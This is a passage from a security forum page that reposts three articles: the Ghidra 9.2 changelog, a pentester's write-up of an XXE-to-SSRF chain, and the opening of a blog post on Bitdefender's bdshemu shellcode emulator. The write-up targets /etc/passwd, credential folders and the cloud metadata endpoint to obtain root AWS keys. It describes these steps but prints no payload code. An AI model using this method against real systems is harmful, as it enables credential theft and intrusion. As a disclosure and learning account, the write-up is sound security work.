https://hacker.house/lab/cve-2020-18471/
  9. Change Log Ghidra v9.2 (November 2020) New Features Graphing. A new graph service and implementation was created. The graph service provides basic graphing capabilities. It was also used to generate several different types of graphs including code block graphs, call graphs, and AST graphs. In addition, an export graph service was created that supports various formats. (GP-211) PDB. Added a new, prototype, platform-independent PDB analyzer that processes and applies data types and symbols to a program from a raw (non-XML-converted) PDB file, allowing users to more easily take advantage of PDB information. (GT-3112) Processors. Added M8C SLEIGH processor specification. (GT-3052) Processors. Added support for the RISC-V processor. (GT-3389, Issue #932) Processors. Added support for the Motorola 6809 processor. (GT-3390, Issue #1201) Processors. Added CP1600-series processor support. (GT-3426, Issue #1383) Processors. Added V850 processor module. (GT-3523, Issue #1430) Improvements Analysis. Increased the speed of the Embedded Media Analyzer, which was especially poor for large programs, by doing better checking and reducing the number of passes over the program. (GT-3258) Analysis. Improved the performance of the RTTI analyzer. (GT-3341, Issue #10) Analysis. The handling of Exception records found in GCC-compiled binaries has been sped up dramatically. In addition, incorrect code disassembly has been corrected. (GT-3374) Analysis. Updated Auto-analysis to preserve work when encountering recoverable exceptions. (GT-3599) Analysis. Improved efficiency when creating or checking for functions and namespaces which overlap. (GP-21) Analysis. Added partial support of Clang for Windows. (GP-64) Analysis. RTTI structure processing speed has been improved with a faster technique for finding the root RTTI type descriptor. (GP-168, Issue #2075) API. The performance of adding large numbers of data types to the same category has been improved. (GT-3535) API. Added the BigIntegerNumberInputDialog that allows users to enter integer values larger than Integer.MAX_VALUE (2147483647). (GT-3607) API. Made JSON more available using GSON. (GP-89, Issue #1982) Basic Infrastructure. Introduced an extension point priority annotation so users can control extension point ordering. (GT-3350, Issue #1260) Basic Infrastructure. Changed file names in launch.bat to always run executables from System32. (GT-3614, Issue #1599) Basic Infrastructure. Unknown platforms now default to 64-bit. (GT-3615, Issue #1499) Basic Infrastructure. Updated sevenzipjbinding library to version 16.02-2.01. (GP-254) Build. Ghidra's native Windows binaries can now be built using Visual Studio 2019. (GT-3277, Issue #999) Build. Extension builds now exclude gradlew artifacts from zip file. (GT-3631, Issue #1763) Build. Reduced the number of duplicated help files among the build jar files. (GP-57, Issue #2144) Build. Git commit hash has been added to application.properties file for every build (not just releases). (GP-67) Contrib. Extensions are now installed to the user's settings directory, not the Ghidra installation directory. (GT-3639, Issue #1960) Data Types. Added mutability data settings (constant, volatile) for Enum datatype. (GT-3415) Data Types. Improved Structure Editor's Edit Component action to work on array pointers. (GP-205, Issue #1633) Decompiler. Added Secondary Highlights to the Decompiler. This feature allows the user to create a highlight for a token to show all occurrences of that token. Further, multiple secondary highlights are allowed at the same time, each using a unique color. See the Decompiler help for more information. (GT-3292, Issue #784) Decompiler. Added heuristics to the Decompiler to better distinguish whether a constant pointer refers to something in the CODE or DATA address space, for Harvard architectures. (GT-3468) Decompiler. Improved Decompiler analysis of local variables with small data types, eliminating unnecessary casts and mask operations. (GT-3525) Decompiler. Documentation for the Decompiler, accessible from within the Code Browser, has been rewritten and extended. (GP-166) Decompiler. The Decompiler can now display the namespace path (or part of it) of symbols it renders. With the default display configuration, the minimal number of path elements necessary are printed to fully resolve the symbol within the current scope. (GP-236) Decompiler. The Decompiler now respects the Charset and Translate settings for string literals it displays. (GP-237) Decompiler. The Decompiler's analysis of array accesses is much improved. It can detect more and varied access patterns produced by optimized code, even if the base offset is not contained in the array. Multi-dimensional arrays are detected as well. (GP-238, Issue #461, #1348) Decompiler. Extended the Decompiler's support for analyzing class methods. The class data type is propagated through the this pointer even in cases where the full prototype of the method is not known. The methods isThisPointer() and isHiddenReturn() are now populated in HighSymbol objects and are accessible in Ghidra scripts. (GP-239, Issue #2151) Decompiler. The Decompiler will now infer a string pointer from a constant that addresses the interior of a string, not just the beginning. (GP-240, Issue #1502) Decompiler. The Decompiler now always prints the full precision of floating-point values, using the minimal number of characters in either fixed point or scientific notation. (GP-241, Issue #778) Decompiler. The Decompiler's Auto Create Structure command now incorporates into new structures data-type information from function prototypes. The Auto Fill in Structure variant of the command will override undefined and other more general data-types with discovered data-types if they are more specific. (GP-242) Demangler. Modified Microsoft Demangler (MDMang) to handle symbols represented by MD5 hash codes when their normal mangled length exceeds 4096. (GT-3409, Issue #1344) Demangler. Upgraded the GNU Demangler to version 2.33.1. Added support for the now-deprecated GNU Demangler version 2.24 to be used as a fallback option for demangling. (GT-3481, Issue #1195, #1308, #1451, #1454) Demangler. The Demangler now more carefully applies information if generic changes have been made. Previously if the function signature had changed in any way from default, the demangler would not attempt to apply any information including the function name. (GP-12) Demangler. Changed MDMang so cast operator names are complete within the qualified function name, effecting what is available from internal API. (GP-13) Demangler. Added additional MDMang Extended Types such as char8_t, char16_t, and char32_t. (GP-14) Documentation. Removed Eclipse BuildShip instructions from the DevGuide. (GT-3634, Issue #1735) FID. Regenerated FunctionID databases. Added support for Visual Studio versions 2017 and 2019. (GP-170) Function Diff. Users may now add functions ad-hoc to existing function comparison panels. (GT-2229) Function Graph. Added Navigation History Tool option for Function Graph to signal it to produce fewer navigation history entries. (GT-3233, Issue #1115) GUI. Users can now view the Function Tag window to see all functions associated with a tag, without having to inspect the Listing. (GT-3054) GUI. Updated the Copy Special action to work on the current address when there is no selection. (GT-3155, Issue #1000) GUI. Significantly improved the performance of filtering trees in the Ghidra GUI. (GT-3225) GUI. Added many optimizations to increase the speed of table sorting and filtering. (GT-3226, Issue #500) GUI. Improved performance of bit view component recently introduced to Structure Editor. (GT-3244, Issue #1141) GUI. Updated usage of timestamps in the UI to be consistent. (GT-3286) GUI. Added tool actions for navigating to the next/previous functions in the navigation history. (GT-3291, Issue #475) GUI. Filtering now works on all tables in the Function Tag window. (GT-3329) GUI. Updated the Ghidra File Chooser so that users can type text into the list and table views in order to quickly jump to a desired file. (GT-3396) GUI. Improved the performance of the Defined Strings table. (GT-3414, Issue #1259) GUI. Updated Ghidra to allow users to set a key binding to perform an equivalent operation to double-clicking the XREF field in the Listing. See the Show Xrefs action in the Tool Options... Key Bindings section. (GT-3446) GUI. Improved mouse wheel scrolling in Listing and Byte Viewers. (GT-3473) GUI. Ghidra's action context mechanism was changed so that actions that modify the program are not accidentally invoked in the wrong context, thus possibly modifying the program in ways the user did not want or without the user knowing that it happened. This also fixed an issue where the navigation history drop-down menu did not represent the locations that would be used if the next/previous buttons were pressed. (GT-3485) GUI. Updated Ghidra tables to defer updating while analysis is running. (GT-3604) GUI. Updated Font Size options to allow the user to set any font size. (GT-3606, Issue #160, #1541) GUI. Added ability to overlay text on an icon. (GP-41) GUI. Updated Ghidra options to allow users to clear default key binding values. (GP-61, Issue #1681) GUI. ToggleDirectionAction button now shows in snapshot windows. (GP-93) GUI. Added a new action to the Symbol Tree to allow users to convert a Namespace to a Class. (GP-225, Issue #2301) Importer. Updated the XML Loader to parse symbol names for namespaces. (GT-3293) Importer:ELF. Added support for processing Android packed ELF Relocation Tables. (GT-3320, Issue #1192) Importer:ELF. Added ELF import opinion for ARM BE8. (GT-3642, Issue #1187) Importer:ELF. Added support for ELF RELR relocations, such as those produced for Android. (GP-348) Importer:MachO. DYLD Loader can now load x86_64 DYLD from macOS. (GT-3611, Issue #1566) Importer:PE. Improved parsing of Microsoft ordinal map files produced with DUMPBIN /EXPORTS (see Ghidra/Features/Base/data/symbols/README.txt). (GT-3235) Jython. Upgraded Jython to version 2.7.2. (GP-109) Listing. In the PCode field of the Listing, accesses of varnodes in the unique space are now always shown with the size of the access. Fixed bug which would cause the PCode emulator to reject valid pcode in rare instances. (GP-196) Listing:Data. Improved handling and display of character sequences embedded in operands or integer values. (GT-3347, Issue #1241) Multi-User:Ghidra Server. Added ability to specify initial Ghidra Server user password (-a0 mode only) for the svrAdmin add and reset commands. (GT-3640, Issue #321) Processors. Updated AVR8 ATmega256 processor model to reflect correct memory layout specification. (GT-933) Processors. Implemented semantics for vstmia/db vldmia/db, added missing instructions, and fixed shift value for several instructions for the ARM/Thumb NEON instruction set. (GT-2567) Processors. Added the XMEGA variant of the AVR8 processor with general purpose registers moved to a non-memory-mapped register space. (GT-2909) Processors. Added support for x86 SALC instruction. (GT-3367, Issue #1303) Processors. Implemented pcode for 6502 BRK instruction. (GT-3375, Issue #1049) Processors. Implemented x86 PTEST instruction. (GT-3380, Issue #1295) Processors. Added missing instructions to ARM language module. (GT-3394) Processors. Added support for RDRAND and RDSEED instructions to x86-32. (GT-3413) Processors. Improved x86 breakpoint disassembly. (GT-3421, Issue #872) Processors. Added manual index file for the M6809 processor. (GT-3449, Issue #1414) Processors. Corrected issues related to retained instruction context during a language upgrade. In some rare cases this retained context could interfere with the instruction re-disassembly. This context-clearing mechanism is controlled by a new pspec property: resetContextOnUpgrade. (GT-3531) Processors. Updated PIC24/PIC30 index file to match latest manual. Added support for dsPIC33C. (GT-3562) Processors. Added missing call-fixup to handle call side-effects for 32 bit gcc programs for get_pc_thunk.ax/si. (GP-10) Processors. Added ExitProcess to PEFunctionsThatDoNotReturn. (GP-35) Processors. External Disassembly field in the Listing now shows Thumb disassembly when appropriate TMode context has been established on a memory location. (GP-49) Processors. Changed RISC-V jump instructions to the more appropriate goto instead of call. (GP-54, Issue #2120) Processors. Updated AARCH64 to v8.5, including new MTE instructions. (GP-124) Processors. Added support for floating point params and return for SH4 processor calling conventions. (GP-183, Issue #2218) Processors. Added semantic support for many AARCH64 neon instructions. Addresses for register lanes are now precalculated, reducing the amount of p-code generated. (GP-343) Processors. Updated RISCV processor to include reorganization, new instructions, and fixes to several instructions. (GP-358, Issue #2333) Program API. Improved multi-threaded ProgramDB access performance. (GT-3262) Scripting. Improved ImportSymbolScript.py to import functions in addition to generic labels. (GT-3249, Issue #946) Scripting. Python scripts can now call protected methods from the GhidraScript API. (GT-3334, Issue #1250) Scripting. Updated scripting feature with better change detection, external jar dependencies, and modularity. (GP-4) Scripting. Updated the GhidraDev plugin (v2.1.1) to support Python Debugging when PyDev is installed via the Eclipse dropins directory. (GP-186, Issue #1922) Sleigh. Error messages produced by the SLEIGH compiler have been reformatted to be more consistent in layout as well as more descriptive and more consistent in providing line number information. (GT-3174) Bugs Analysis. Function start patterns found at 0x0, function signatures applied from the Data Type Manager at 0x0, and DWARF debug symbols applied at 0x0 will no longer cause stack traces. In addition, DWARF symbols with zero length address range no longer stack trace. (GT-2817, Issue #386, #1560) Analysis. Constant propagation will treat an OR with zero (0) as a simple copy. (GT-3548, Issue #1531) Analysis. Corrected Create Structure from Selection, which failed to use proper data organization during the construction process. This could result in improperly sized components such as pointers and primitive types. (GT-3587) Analysis. Fixed an issue where stored context is initializing the set of registers constantly. (GP-25) Analysis. Fixed an RTTI Analyzer regression when analyzing RTTI0 structures with no RTTI4 references to them. (GP-62, Issue #2153) Analysis. Fixed an issue where the RTTI analyzer was not filling out RTTI3 structures in some cases. (GP-111) API. Fixed NullPointerException when attempting to delete all bookmarks from a script. (GT-3405) API. Updated the Class Searcher so that Extension Points found in the Ghidra/patch directory get loaded. (GT-3547, Issue #1515) Build. Updated dependency fetch script to use HTTPS when downloading CDT. (GP-69, Issue #2173) Build. Fixed resource leak in Ghidra jar builder. (GP-342) Byte Viewer. Fixed Byte Viewer to correctly load the middle-mouse highlight color options change. (GT-3471, Issue #1464, #1465) Data Types. Fixed decoding of static strings that have a character set with a smaller character size than the platform's character size. (GT-3333, Issue #1255) Data Types. Correctly handle Java character sets that do not support the encoding operation. (GT-3407, Issue #1358) Data Types. Fixed bug that caused Data Type Manager Editor key bindings to get deleted. (GT-3411, Issue #1355) Data Types. Updated the DataTypeParser to handle data type names containing templates. (GT-3493, Issue #1417) Data Types. Corrected pointer data type isEquivalent() method to properly check the equivalence of the base data type. The old implementation could cause a pointer to be replaced by a conflicting pointer with the same name whose base datatype is not equivalent. This change has a negative performance impact associated with it and can cause additional conflict datatypes due to the rigid datatype relationships. (GT-3557) Data Types. Improved composite conflict resolution performance and corrected composite merge issues when composite bitfields and/or flexible arrays are present. (GT-3571) Data Types. Fixed bug in SymbolPathParser naive parse method that caused a less-than-adequate fall-back parse when angle bracket immediately followed the namespace delimiter. (GT-3620) Data Types. Corrected size of long for AARCH64 per LP64 standard. (GP-175) Decompiler. Fixed bug causing the Decompiler to miss symbol references when they are stored to the heap. (GT-3267) Decompiler. Fixed bug in the Decompiler that caused Deleting op with descendants exception. (GT-3506) Decompiler. Decompiler now correctly compensates for integer promotion on shift, division, and remainder operations. (GT-3572) Decompiler. Fixed handling of 64-bit implementations of alloca_probe in the Decompiler. (GT-3576) Decompiler. Default Decompiler options now minimize the risk of losing code when renaming or retyping variables. (GT-3577) Decompiler. The Decompiler no longer inherits a variable name from a subfunction if that variable incorporates additional data-flow unrelated to the subfunction. (GT-3580) Decompiler. Fixed the Decompiler Override Signature action to be enabled on the entire C-code statement. (GT-3636, Issue #1589) Decompiler. Fixed frequent ClassCast and IllegalArgument exceptions when performing Auto Create Structure or Auto Create Class actions in the Decompiler. (GP-119) Decompiler. Fixed a bug in the Decompiler that caused different variables to be assigned the same name in rare instances. (GP-243, Issue #1995) Decompiler. Fixed a bug in the Decompiler that caused PTRSUB off of non-pointer type exceptions. (GP-244, Issue #1826) Decompiler. Fixed a bug in the Decompiler that caused load operations from volatile memory to be removed as dead code. (GP-245, Issue #393, #1832) Decompiler. Fixed a bug causing the Decompiler to miss a stack alias if its offset was, itself, stored on the stack. (GP-246) Decompiler. Fixed a bug causing the Decompiler to lose Equate references to constants passed to functions that were called indirectly. (GP-247) Decompiler. Addressed various situations where the Decompiler unexpectedly removes active instructions as dead code after renaming or retyping a stack location. If the location was really an array element or structure field, renaming forced the Decompiler to treat the location as a distinct variable. Subsequently, the Decompiler thought that indirect references based before the location could not alias any following stack locations, which could then by considered dead. As of the 9.2 release, the Decompiler's renaming action no longer switches an annotation to forcing if it wasn't already. A retyping action, although it is forcing, won't trigger alias blocking for atomic data-types (this is configurable). (GP-248, Issue #524, #873) Decompiler. Fixed decompiler memory issues reported by a community security researcher. (GP-267) Decompiler. Fix for Decompiler error: Pcode: XML comms: Missing symref attribute in <high> tag. (GP-352, Issue #2360) Decompiler. Fixed bug preventing the Decompiler from seeing Equates attached to compare instructions. (GP-369, Issue #2386) Demangler. Fixed the GnuDemangler to parse the full namespace for operator symbols. (GT-3474, Issue #1441, #1448) Demangler. Fixed numerous GNU Demangler parsing issues. Most notable is the added support for C++ Lambda functions. (GT-3545, Issue #1457, #1569) Demangler. Updated the GNU Demangler to correctly parse and apply C++ strings using the unnamed type syntax. (GT-3645) Demangler. Fixed duplicate namespace entry returned from getNamespaceString() on DemangledVariable. (GT-3646, Issue #1729) Demangler. Fixed a GnuDemangler ClassCastException when parsing a typeinfo string containing operator text. (GP-160, Issue #1870, #2267) Demangler. Added stdlib.h include to the GNU Demangler to fix a build issue on some systems. (GP-187, Issue #2294) DWARF. Corrected DWARF relocation handling where the address image base adjustment was factored in twice. (GT-3330) File Formats. Fixed a potential divide-by-zero exception in the EXT4 file system. (GT-3400, Issue #1342) File Formats. Fixed date and time parsing of dates in cdrom iso9660 image files. (GT-3451, Issue #1403) Graphing. Fixed a ClassCastException sometimes encountered when performing Select -> Scoped Flow -> Forward Scoped Flow. (GP-180) GUI. Fixed inconsistent behavior with the interactive python interpreter's key bindings. (GT-3282) GUI. Fixed Structure Editor bug that prevented the F2 Edit action from editing the correct table cell after using the arrow keys. (GT-3308, Issue #703) GUI. Updated the Structure Editor so the Delete action is put into a background task to prevent the UI from locking. (GT-3352) GUI. Fixed IndexOutOfBoundsException when invoking column filter on Key Bindings table. (GT-3445) GUI. Fixed the analysis log dialog to not consume all available screen space. (GT-3610) GUI. Fixed issue where Location column, when used in the column filters, resulted in extraneous dialogs popping up. (GT-3623) GUI. Fixed Data Type Preview copy action so that newlines are preserved; updated table export to CSV to escape quotes and commas. (GT-3624) GUI. Fixed tables in Ghidra to copy the text that is rendered. Some tables mistakenly copied the wrong value, such as the Functions Table's Function Signature Column. (GT-3629, Issue #1628) GUI. Structure editor name now updates in title bar and tab when structure is renamed. (GP-19) GUI. Fixed an issue where drag-and-drop import locks the Windows File Explorer source window until the import dialog is closed by the user. (GP-27) GUI. Fixed an issue in GTreeModel where fireNodeChanged had no effect. This could result in stale node information and truncation of the text associated with a node in a GTree. (GP-30) GUI. Fixed an issue where the file chooser directory list truncated filenames with ellipses on HiDPI Windows. (GP-31) GUI. Fixed an uncaught exception when double-clicking on UndefinedFunction_ in Decompiler window. (GP-40) GUI. Updated error handling to only show one dialog when a flurry of errors is encountered. (GP-65, Issue #2185) GUI. Fixed an issue where Docking Windows are restored incorrectly if a snapshot is present. (GP-92) GUI. Fixed a File Chooser bug causing a NullPointerException for some users. (GP-171, Issue #1706) GUI. Fixed an issue that caused the script progress bar to appear intermittently. (GP-179, Issue #1819) GUI. Fixed a bug that caused Call Tree nodes to go missing when showing more than one function with the same name. (GP-213, Issue #1682) GUI:Project Window. Fixed Front End copy action to allow for the copy of program names so that users can paste those names into external applications. (GT-3403, Issue #1257) Headless. Headless Ghidra now properly honors the -processor flag, even if the specified processor is not a valid opinion. (GT-3376, Issue #1311) Importer. Corrected an NeLoader flags parsing error. (GT-3381, Issue #1312) Importer. Fixed the File -> Add to Program... action to not show a memory conflict error when the user is creating an overlay. (GT-3491, Issue #1376) Importer. Updated the XML Importer to apply repeatable comments. (GT-3492, Issue #1423) Importer. Fixed issue in Batch Import where only one item of a selection was removed when attempting to remove a selection of items. (GP-138) Importer. Corrected various issues with processing crushed PNG images. (GP-146, Issue #1854, #1874, #1875, #2252) Importer. Fixed RuntimeException occurrence when trying to load NE programs with unknown resources. (GP-182, Issue #1596, #1713, #2012) Importer. Fixed batch import to handle IllegalArgumentExceptions thrown by loaders. (GP-227, Issue #2328) Importer:ELF. Corrected ELF relocation processing for ARM BE8 (mixed-endian). (GT-3527, Issue #1494) Importer:ELF. Corrected ELF relocation processing for R_ARM_PC24 (Type: 1) that was causing improper flow in ARM disassembly. (GT-3654) Importer:ELF. Corrected ELF import processing of DT_JMPREL relocations and markup of associated PLT entries. (GP-252, Issue #2334) Importer:PE. Fixed an IndexOutOfBoundsException in the PeLoader that occurred when the size of a section extends past the end of the file. (GT-3433, Issue #1371) Listing:Comments. Fixed bug in Comment field that prevented navigation when clicking on an address or symbol where tabs were present in the comment. (GT-3440) Memory. Fixed bug where sometimes random bytes are inserted instead of 0x00 when expanding a memory block. (GT-3465) Processors. Corrected the offset in SuperH instructions generated by sign-extending a 20-bit immediate value composed of two sub-fields. (GT-3251, Issue #1161) Processors. Fixed AVR8 addition/subtraction flag macros. (GT-3276) Processors. Corrected XGATE ROR instruction semantics. (GT-3278) Processors. Corrected semantics for SuperH movi20 and movi20s instructions. (GT-3337, Issue #1264) Processors. Corrected SuperH floating point instruction token definition. (GT-3340, Issue #1265) Processors. Corrected SuperH movu.b and movu.w instruction semantics. (GT-3345, Issue #1271) Processors. Corrected AVR8 lpm and elpm instruction semantics. (GT-3346, Issue #631) Processors. Corrected pcode for the 6805 BSET instruction. (GT-3366, Issue #1307) Processors. Corrected ARM constructors for instructions vnmla, vnmls, and vnmul. (GT-3368, Issue #1277) Processors. Corrected bit-pattern for ARM vcvt instruction. (GT-3369, Issue #1278) Processors. Corrected TriCore abs instructions. (GT-3379, Issue #1286) Processors. Corrected x86 BT instruction semantics. (GT-3423, Issue #1370) Processors. Fixed issue where CRC16C LOAD/STOR with abs20 were not mapped correctly. (GT-3529, Issue #1518) Processors. Fixed M68000 MOVE USP,x and MOVE x,USP opcodes. (GT-3594, Issue #1593) Processors. Fixed the ARM/Thumb TEQ instruction pcode to be an XOR. (GP-23, Issue #1802) Processors. Emulation was broken by a regression in version 9.1.2. Emulation and Sleigh Pcodetests now work correctly. (GP-24, Issue #1579) Processors. Fixed carry flag issue for 6502 CMP, CPX, and CPY instructions. (GP-34) Processors. Corrected the SuperH high-order bit calculation for the rotr instruction. (GP-47) Processors. Corrected ELF ARM relocation processing for type 3 (R_ARM_REL32) and added support for type 42 (R_ARM_PREL31). (GP-164, Issue #2261, #2276) Scripting. Moved Jython cache directory out of tmp. (GP-36) Scripting. Fixed a NoClassDefFoundError when compiling GhidraScript under JDK14. (GP-59, Issue #2152) Scripting. Fixed issues with null result when searching for the script directory. (GP-103, Issue #2187) Scripting. Fixed scripting issue where, if there were non-ASCII characters in the user path, Jython would not work. (GP-204, Issue #1890) Sleigh. Corrected IndexOutOfBoundsException in SLEIGH when doing simple assignment in disassembly actions block. (GT-3382, Issue #745) Symbol Tree. Fixed the Symbol Tree so that clicking an already-selected symbol node will still trigger a Listing navigation. (GT-3436, Issue #453) Symbol Tree. Fixed the Symbol Tree to not continuously rebuild while performing Auto-analysis. (GT-3542) Version Tracking. Fixed Version Tracking Create Manual Match action. (GT-3305, Issue #2215) Version Tracking. Fixed a NullPointerException encountered when changing the Version Tracking options for the Listing Code Comparison when no data was loaded. (GT-3437, Issue #1143) Version Tracking. Fixed Version Tracking exception triggered in the Exact Functions Instructions Match correlator encountered when the two functions being compared differed in their number of instructions. (GT-3438, Issue #1352) Sursa: https://ghidra-sre.org/releaseNotes_9.2.html
  10. Unique XXE to AWS Keys journey BrOoDkIlLeR 1 day ago·7 min read Version en español: acá Always trust your feelings and try everything, even if you think its crazy or will not work… it may work. If you run out of ideas, go away and they will come Been asked to do a private web pentest (too bad it was not a bugbounty program). It’s my first paid one so I wanted to do it as best as I can. The client is a company with presence in 15+ countries, 120+ clients worldwide and 12+ million final users. So that’s a lot. I will go directly to relevant results, so don’t think it was all open doors. When I ask a question to you or there is an image, please take a time to think what would you do next before reading what I did, take it as a practice. I been given a domain to test and a user/password, so let’s get started. At first sight I can see the application is huge and very robust. It has many functions to test, many profiles, so I start runing a basic dirsearch just to see what is there in the background. Some xml configuration files appeared implying there is a Tomcat somewhere. Reading the contents of the xml file I notice some <url-pattern> tag, so mi instinct told me to try some GET requests with Burp to see what response I get. GET Request / Response Response has Server: nginx header… so what does this architecture looks like? Like this Part of client’s architecture So the endpoint exists but it did not like GET request type so I tried POST. POST Request / Response In response you can see there is a Content-type header with text/xml value, so the response should contain a valid XML. In this case I only got “Could not access envelope: Unable to create…” error. So, what would you try? I went directly to the worst case escenario I thought of where there is an XXE vulnerabily. So I got some XXE payloads googling “XXE payloads”. I added Content-type Request header with text/xml (because that is what the server is expecting and I have to tell him what the hell am I sending) and I copypasted the very first payload which tries to access /etc/passwd file. And this happened First XXE Payload used with POST Request / Response So what’s going on ? Response code was 200 (OK). Its seems like server is trying to read the contents of /etc/passwd file and make a valid XML file to craft a Response, but the final XML is not well formed because some thing in line 33 of /etc/passwd breaks parsing. Now we know that maybe /etc/passwd file has 33 lines. I asked the Client that and he confirmed that the web server has a /etc/passwd file with 33 lines long. So the next thing is to try to get the contents and we are done! Until now, in a bugbounty program this may not be considered as a POC, because we cannot do any harm to anyone with this. So you must keep digging until you have some hot pottatoe. I made a SSRF Request and it worked! I knew port 8080 is the default port for Tomcat server, and I knew it from Google Chrome console. In the first payload sent when I got 405 error, it shows this Chrome’s console showing backend IP:port So I tried that SSRF at backend server (Tomcat) on localhost (127.0.0.1) and port 8080 (default) The server made a request to himself to obtain the external DTD and answered with an error. It tried to parse the HTML I requested and it raises an error. Later I found the HTML code was this Note the missing </meta> tag that breaks XML parsing So I tried another port to see how it behaves SSRF Connection refused because port 8081 is closed So port 8081 is closed. We can check every port with Burp Intruder and see responses (its like an nmap but HTTP) just to check what other services are there (until now we only know port 8080). There were at least 8 ports open (only tried nmap top 1000) So I wanted to get some juicy files contents and here comes the “try harder” part. Tried maaany payloads (except DoS ones) one by one, modified them in every way I could think of, tried wrappers like file://, php://, dict://, expect:// etc., but they were disabled, read many writeups, and nothing… until I managed to make one payload to work but with an UNIQUE TWIST. The mechanisms looks like this: Credits: securityboulevard.com So, instead of sending the Request with all the XML file at once like before, some part of it is hosted on my own host (External DTD). So the web application has to gather all parts of the XML to understand it and then make some Response (we already demonstrate local resources access with SSRF, but.. what about internet resources?) Payload sent in POST Request External DTD — &#x25; is % encoded, if not, it breaks parsing What do you see in External DTD that’s weird? I hosted the External DTD file (a.dtd) in my own host. So the weird part comes as I didn’t request /etc/passwd file (I did it like before and receive the same “Error on line 33…” Response). I requested / And this was the response Response for file:/// request Wait, WHAT? YES! Thats the weird and amazing part! Instead of getting an error, I got directory listing ! Never read/heard of this behavior before in any writeup I have ever read, but this is GOLD! Do you know why it happens? I didn’t… some days after this found this. It seems that Java lists directory contents when a directory is requested instead of a file. So instead of trying to guess some files and directories, I took my time to manually browse many folders to gain more impact. Ended up finding a lot of private keys, config files, sensitive data, third party service passwords, clients information, etc. But the most important data I found was… AWS credentials! Tried to get some through AWS metadata but I received ones with 0 (zero) privileges. In a folder like /xxx/xxx/xxx/xxx/credentials was this AWS Access key & Secret Key I run out to find what privileges they have with PACU and AWS CLI. Found out that they had root access, so… what’s there more juicy than that? AWS Access Keys Privileges What would you do with that kind of access? For example, a cybercriminal could: Change instances states: he could terminate all of them (there is no more service, or.. no more Company?), start, stop or create new ones Make use of them (mine bitcoins, deploy backdoors, scripts). Imagine billings… Steal data (credit cards, personal information), Deny access Anything… So, just to check since the application is hosted on an AWS EC2 (just a cloud computer hosted on Amazon’s datacenter) I tried to acces it’s metadata through SSRF like before. It also worked! (with external DTD, not with the basic payload, requesting http://169.254.169.254/latest/meta-data/iam instead of file:///) SSRF to http://169.254.169.254/latest/meta-data/iam At this point the contents of /etc/passwd were trivial Conclusions I am super happy with the results I got. Managed to find some other things like XSS, outdated software and some more. So I learnt: XXE SSRF Port scanning with SSRF Proxy / Backend architecture To have patience Takeaways Always try to escalate bugs and go as deep as you can Do manual testing, so far I got the best results rather than automating (was useful for port scanning part with SSRF) When you face a problem, try all the things that comes to your mind like I did (a lot will come if you had read consciously writeups and information and suddenly all dots and info comes togheter to aid you!! ) Be organized and take notes & screenshots (maybe the client fixes the problem in the meantime and you have nothing otherwise) If you get stuck, take some time off and come back with new fresh ideas Try to chain bugs or vulnerabilities you found and use them togheter for your advantage We know nothing (right? this is a neverending learning journey), so ask for help, advice or directions if you need to (you can do it in an anonymously way too) Be ethical and humble with the Client, they have developers / infra people that are humans and made mistakes like we do. Work with them to solve the issues Learn from all the things you did. Notice that if you have to do some testing with similar infrastructure you have experience already! You will try to go directly to the hot part ! Take some time off and sleep well, your brain will continue to process all what you have learn so far Share with the community ! Hope you enjoyed, thanks for reading so far !!! Sursa: https://medium.com/@estebancano/unique-xxe-to-aws-keys-journey-afe678989b2b
  11. bdshemu: The Bitdefender shellcode emulator Nov 11, 2020 • Andrei Lutas Introduction Detecting exploits is one of the major strengths of Hypervisor Memory Introspection (HVMI). The ability to monitor guest physical memory pages against different kinds of accesses, such as write or execute, allows HVMI to impose restrictions on critical memory regions: for example, stack or heap pages can be marked as being non-executable at the EPT level, so when an exploit manages to gain arbitrary code execution, the introspection logic would step in and block the execution of the shellcode. In theory, intercepting execution attempts from memory regions such as the stack or the heap should be enough to prevent most of the exploits. Real life is often more complicated, and there are many cases where legit software uses techniques that may resemble on attack - Just In Time compilation (JIT) in browsers is one good example. In addition, an attacker may store its payload in other memory regions, outside the stack or the heap, so a method of discerning good code from bad code is useful. We will talk in this blog post about the Bitdefender Shellcode Emulator, or bdshemu for short. bdshemu is a library capable of emulating basic x86 instructions (in all modes - 16, 32 and 64 bit), while observing shellcode-like behavior. Legitimate code, such as JIT code, will look different compared to a traditional shellcode, so this is what bdshemu is trying to determine: whether the emulated code behaves like a shellcode or not. bdshemu Overview bdshemu is a library written in C, and is part of the bddisasm project (and of course, it makes use of bddisasm for instruction decoding). The bdshemu library is built to emulate x86 code only, so it has no support for API calls. In fact, the emulation environment is highly restricted and stripped down, and there are only two memory regions available: The page(s) containing the emulated code; The stack; Both of these memory regions are virtualized, meaning that they are in fact copies of the actual memory being emulated, so modifications made to them don’t affect the actual system state. Any access made by the emulated code outside of these two areas (which we will call the shellcode and the stack, respectively) will trigger immediate emulation termination. For example, an API call will automatically cause a branch outside the shellcode region, thus terminating emulation. However, in bdshemu, all we care about is instruction-level behavior of the code, which is enough to tell us whether the code is malicious or not. While bdshemu provides the main infrastructure for detecting shellcodes inside a guest operating-system, it is worth noting that this is not the only way HVMI determines that execution of a certain page is malicious - two other important indicators are used: The executed page is located on the stack - this is common with stack-based vulnerabilities; The stack is pivoted - when a page is first executed and the RSP register points outside the normal stack allocated for the thread; These two indicators are enough on their own to trigger an exploit detection. If these are not triggered, bdshemu is used to take a good look at the executed code, and decide if it should be blocked or not. bdshemu Architecture bdshemu is created as a standalone C library, and it only depends on bddisasm. Working with bdshemu is fairly simple, as just like bddisasm, it is a single-API library: SHEMU_STATUS ShemuEmulate( SHEMU_CONTEXT *Context ); The emulator expects a single SHEMU_CONTEXT argument, containing all the needed information in order to emulate the suspicious code. This context is split in two sections - input parameters and output parameters. The input parameters must be supplied by the caller, and they contain information such as the code to be emulated, or initial register values. The output parameters contain information such as what shellcode indicators bdshemu detected. All these fields are well documented in the source-code. Initially, the context is filled in with the following main information (please note that emulation outcome may change depending on the value of the provided registers and stack): Input registers, such as segments, general purpose registers, MMX and SSE registers; they can be left 0, if they are not known, or if they are irrelevant; Input code, which is the actual code to be emulated; Input stack, which can contain actual stack contents, or can be left 0; Environment info, such as mode (32 or 64 bit), or ring (0, 1, 2 or 3); Control parameters, such as minimum stack-string length, minimum NOP sled length or the maximum number of instructions that should be emulated; The main output parameter is the Flags field, which contains a list of shellcode indicators detected during the emulation. Generally, a non-zero value of this field strongly suggests that the emulate code is, in fact, a shellcode. bdshemu is built as a plain, quick and simple x86 instruction emulator: since it only works with the shellcode itself and a small virtual stack, it doesn’t have to emulate any architectural specifics - interrupts or exceptions, descriptor tables, page-tables, etc. In addition, since we only deal with the shellcode and stack memory, bdshemu does not do memory access checks, since it 